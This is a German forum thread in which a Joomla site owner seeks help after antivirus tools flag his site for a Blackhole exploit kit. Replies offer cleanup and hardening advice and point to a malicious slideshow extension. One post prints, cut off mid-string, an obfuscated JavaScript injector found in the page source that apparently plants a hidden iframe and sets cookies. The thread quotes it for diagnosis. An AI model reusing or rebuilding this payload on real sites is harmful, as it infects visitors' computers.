Joomla Homepage Virus

    Hallo Leute,


    ich habe vor ein paar Monaten eine Homepage mit Joomla erstellt. Seit ein paar Tagen meldet mir AVG beim Besuch der Website, dass es dort Mailware (Blackhole exploit kit) gibt, welches auf meinem PC zugreifen möchte. Der Zugriff auf die Seite wird dadurch (zurecht) blockiert. Es handelt sich um die Seite http://www.uni-hilft.de . Gibt es irgendwie eine Möglichkeit die Seite noch zu reinigen oder ein Antivirenprogramm auf die Datein auf dem Server zu schmeißen?


    Bin verzweifelt, weil ich meinem PC formatiert habe und die Homepagedatein nur noch auf dem Server liegen, weil sich ich versehentlich nicht kopiert habe =( (Ich weiß selber Schuld...)


    Viele Grüße


    Jan

    Danke für eure schnellen Antworten. Joomla ist leider nicht auf der aktuellsten Version. Ich hatte neulich mal Maleware auf meinem PC installiert, deshalb musste ich formatieren. Jetzt ist mein PC aber clean, nur hat die Maleware anscheinend meinen Homepages gehackt und jetzt sind diese infiziert.

    Hallo Pelzer,


    solang sich noch malware im Content befindet sollten Sie zumindest den Dienst (apache http) beenden um eine weiter Verbreitung zu vermeiden.


    Robert

    Von Quttera wird das Script


    ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,175,161,151,170,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,175,161,151,170,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,147,171,162,145,166,150,61,166,163,145,150,167,154,163,173,62,150,151,63,166,151,160,145,175,62,164,154,164,53,77,21,16,44,175,161,151,170,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,175,161,151,170,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,175,161,151,170,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,175,161,151,170,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,175,161,151,170,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,175,161,151,170,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,175,161,151,170,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,175,161,151,170,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,175,161,151,170,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,175,161,151,170,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,16


    auf der Seite im Quelltest <zurecht> als gefährlich eingestuft. Habt ihr eine Ahnung, in welcher Datei ich den Übeltäter finden könnte? Eine Löschung in der index.php bringt keinen Erfolg.


    PS: Quttera ist der einzige Dienst der Webseiten analysiert und diese hier als gefährdet einstuft.

    Tu Dir selber einen Gefallen und stell Deine Seite auf vernünftige Beine. ;)
    Joomla ist nun mal nicht die sicherste Plattform, auch wenn es wahrscheinlich jetzt wieder Unkenrufe gibt.


    Du hast ja so ungefähr im Kopf, wann Du die Seite das letzte mal aktuallisiert hast.
    Vergleiche per FTP die Datum-Angaben der Dateien, jede Datei, die später geändert wurde, dürfte infiziert sein.
    Zudem gibt es Log-Dateien, die Dir ebenso anzeigen, wann Dateien geändert wurden und von wo das kam.


    Alle Passwörter ändern!


    Welches FTP-Programm nutzt Du?
    Solltest Du FileZilla verwenden, abschaffen und WinSCP nehmen.
    Möglichst nur verschlüsselte Übertragungen nutzen, dann wird auch das Passwort nicht im Klartext übertragen.


    Bei einem Server, Server- und Ordnerrechte kontrollieren, zudem nachsehen ob sich ein Benutzer eingeschlichen hat, der nicht aufs System gehört!


    Server absichern, wie das geht findest Du im Wiki.


    Habe ich etwas vergessen?
    Dann sorry, aber Andere dürfen auch mal. :)

    Schöne Grüße aus der Lüneburger Heide!
    Thomas

    Muss das hier nochmal aufgreifen.. Deine Seite wird von avast! nach wie vor blockiert. Grund ist die "Autson Slideshow", die tückisches JS enthält.
    Der dev wurde schon vor längerem aus dem Joomla Extensions Directory gebannt.


    Da die Slideshow an sich recht schick ist, findest du hier eine Anleitung zur Behebung des Problems.
    Weiterführende Infos zur Angelegenheit auch im Joomla Forum.


    Immer schön dran denken alles aktuell zu halten.. ;)


    Gruß


    Pascal